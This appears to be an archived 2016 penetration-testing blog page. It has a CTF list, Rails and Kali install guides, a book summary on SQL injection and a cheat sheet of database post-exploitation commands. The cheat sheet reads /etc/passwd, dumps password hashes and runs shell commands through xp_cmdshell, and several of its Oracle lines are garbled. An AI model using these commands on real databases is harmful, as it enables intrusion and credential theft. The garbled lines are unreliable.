Wednesday, February 17, 2016

Practice CTF List / Permanant CTF List

I'm on a mission to becoming a great penetration tester. This is a list of CTF's 
Note: some links might or might not work so just try them. 

Live Online Games

Recommended

Whether they're being updated, contain high quality challenges, or just have a lot of depth, these are probably where you want to spend the most time.

Others

Meta

Webapp Specific

Forensics Specific

Recruiting

Paid Training

Downloadable Offline Games

Virtual Machines

Inactive or Gone

Just around for historical sake, or on the off-chance they come back.

Monday, February 15, 2016

How to install Ruby on Rails on CentOS 6

This is a quick tutorial on how to install Ruby on Rails on CentOS 6. Before installing Ruby on Rail just want to briefly explain what Ruby on Rails is. Ruby on Rails is an application stack that provides web developers with a framework to quickly create a web application. All right well enough jabbering lets get on with the installation.

Installing Ruby 2.18 using rvm.
NOTE: by default ruby 1.8.7 is installed on centos 6.

Step 1. Install the required packages
# yum install gcc-c++ patch readline readline-devel zlib zlib-devel 
# yum install libyaml-devel libffi-devel openssl-devel make 
# yum install bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
Step 2. Install the latest version of RVM
# curl -L get.rvm.io | bash -s stable
# cd tar -xzvf /usr/local/rvm/archives/rvm-1.26.11.tgz
# cd /usr/local/rvm/archives/rvm-1.26.11/binscripts
# ./rvm-installer
Step 3.  Setup the RVM Environment 
# source /etc/profile.d/rvm.sh
Step 4. Install ruby 
# rvm install 2.1.8

Step 5.  Configure the Default version of Ruby 
# rvm use 2.1.8 --default

Using /usr/local/rvm/gems/ruby-2.1.8

Step 6.  Check the current version of Ruby 

# ruby --version

ruby 2.1.8p440 (2015-12-16 revision 53160) [x86_64-linux]

Install Rails 
#gem install rails -V
Create a Test Application (Optional) to verify that Rails is working properly
NOTE: After running the rails server --binding= the following error might pop up " There was an error while trying to load the gem 'uglifier'" if you see this error you will need to install nodejs. Run the following commands to install nodejs  

curl -sL https://rpm.nodesource.com/setup | bash -
yum install -y nodejs
npm install -g express-generator
npm -g install npm@latest

cd ~

rails new testapp 
The move into the applications directory 
# cd testapp
Create the sqlite3 database:
rake db:create 
http://server ip address:3000

Sunday, February 14, 2016

Upgrading from Kali Linux 2.0(sana) to Kali Linux rolling edition

I've been putting a lot of things off as of late and upgrading my kali linux has been one of them, but no more :). The is a quick step by step guide on how to upgrading to Kali Linux rolling edition.


Step1. Before doing anything just do a quick apt-get update and apt-get upgrade to apply any outstanding updates to the kali linux 2.0 image.

Step2. Once the updates have been applied. The go ahead and open the /etc/apt/sources.list with your favorite editor (mine being vim) and add the following information to the file.

deb http://http.kali.org/kali kali-rolling main non-free contrib

Step3.  After adding the above source to the /etc/apt/sources.list file run the following commands and just walk a way and grab some coffee and a pop tart (yum).

apt-get update
apt-get dist-upgrade
reboot

Step4. After completing the upgrade and rebooting, when booting into the Kali linux rolling edition you may have to reinstall open-vm-tools-desktop in order to make sure your full screen option works properly with the rolling edition.

Note: After  the upgrade i've noticed a couple of changes

1. the network card changed from eth0 to eno16777736 this is kinda similar to the network card settings in an default centos 7 installation.

2. After upgrading to kali linux rolling my display in full screen mode was still not right. After hours of searching and testing i found the solution that worked for me by running the following commands:



# uninstall vmware tools  (note: I transitioned from Kali 2.0):
vmware-uninstall-tools.pl 

# uninstall open-vm-tools
apt-get remove open-vm-tools-desktop
apt-get autoremove
reboot

# install open-vm-tools
apt-get install  open-vm-tools-desktop
reboot



Saturday, February 13, 2016

Post Exploitation The Database Edition

As a web app pentester there is nothing more annoying then encountering a database that you have never worked with before and having to search all over the net for post exploitation commands in order to gather more information. So This is just a small list that i put together for myself and as time goes on this list will grow and i will continue to update this post. I hope this small list can help someone else out during a web app penetration test.


Postgres Post Exploitation Commands

select version();
select current_database();
select current_user;
select session_user;
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
select * from pg_shadow;
select * from pg_group;
create table myfile (input TEXT);
copy myfile from '/etc/passwd';
select * from myfile;copy myfile to /tmp/test;


DB2 Post Exploitation Commands

select versionnumber, version_timestamp from sysibm.sysversions;
select user from sysibm.blah;
select session_user from sysibm.blah;
select system_user from sysibm.blah;
select current server from sysibm.blah;
select name from sysibm.systables;
select grantee from syscat.dbauth;
select * from syscat.tabauth;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select name, tbname, coltype from sysibm.syscolumns;
SELECT schemaname FROM syscat.schemata;

MS SQL Post Exploitation Commands

select @@version
select @@servernamee
select @@microsoftversione
select * from master..sysserverse
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+'
BACKUP database master to disks='\\\\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select
* from myfile"--


Oracle Post Exploitation Commands


SELECT • FROM v$version;
SELECT version FROM v$instance;
SELECT instance name FROM v$instance;
SELECT name FROM v$database;
SELECT DISTINCT owner FROM all tables;
SELECT user FROM dual;
SELECT username FROM all users ORDER BY username;
SELECT column name FR0l1 all tab columns; SELECT table name FROM all tables;
SELECT name,-password, astatus FROt1 SJS.user$;

SELECT DISTINCT grantee FR0t1 dba SfS_prlvS WHERE ADlHN OPTION I YES;


SQL injection - Attacks and defense second edition by Justin Clarke

As my journey to becoming a very solid web application penetration tester continue's just taking the time out to  blog about the SQL Injection Attacks and Defense (Second Edition book). If you don't have this book in your library i would recommend you pick up a copy. This book is an excellent resource if you want to learn the in's and outs of SQL injection and how it works.  I've summarized each chapter of the book so without further ado lets get into it.


This book has 10 chapters

Chapter 1 - What is SQL injection?

This is just basic introduction to the topic of the book. Its kinda of a weird chapter, But I would recommend that you read it and re-read it at the end.


Chapter 2 - Testing for SQL injection

This chapter looks at SQL injection from a hackers perspective and shows how to find SQL injection samples in a web application thats connected to a database. This is a nice intro to the rest of the book. It provides useful tips about displayed SQL errors in MS SQL server, MySQL and Oracle.

Chapter 3 - Reviewing code for SQL injection

This chapter looks at SQL injection from a "developer's point of view and shows how to follow user data through lines of PHP, Java and C# code. The end of the chapter mentions some source code analysis tools like YASCA or the MS Source Code Analyzer for SQL Injection.

Chapter 4 - Exploiting SQL injection

This chapter talks about exploiting SQL injection using steps such as identifying the database, extracting data through UNION statements, using conditional statements, enumerating the database schema, escalating privileges, stealing password hashes, out-of-band communication

Chapter 5 - Blind SQL injection exploitation

This chapter talking about Using time-based, binary search, bit-by-bit inference and response=based techniques, they present ways to infer knowledge out of the interaction with a database.

Chapter 6 - Exploiting the operating system

This chapter discusses ways to read and write files and execute OS commands.

Chapter 7 - Advanced topics

This chapter describes ways to evade input filters, to exploit second-order SQL injection and to use hybrid attacks.

Chapter 8 - Code-level defenses

This is the chapter that "developers" should read without any doubt. The key to avoid SQL injection attacks is to completely code the access to a database based on customised parameters that are out of the users' reach. The authors propose a series of recommendations to validate input and to encode output.

Chapter 9 - Platform-level defenses

Together with excellent coding practices, there are some measures, related to the operating platform, that we can take to avoid SQL injection. These are, for example, using web application firewalls, web server filters, IDSs and securing the database itself.

Chapter 10 - This chapter is the chapter every "white hat hacker" should have at hand when assessing a web app connected to a database. It is a great reference of SQL commands and SQL injection tweaks for SQL Server, MySQL, Oracle, PostgreSQL and even DB2.
one.

Again i would recommend this book to anyone who is serious about really learning about sql injection.

Cracking Kerberos Service Tickets (TGS) Using Kerberoasting

As of late I've been spending a lot of time researching and learning different techniques when it comes to attacking Active Directory En...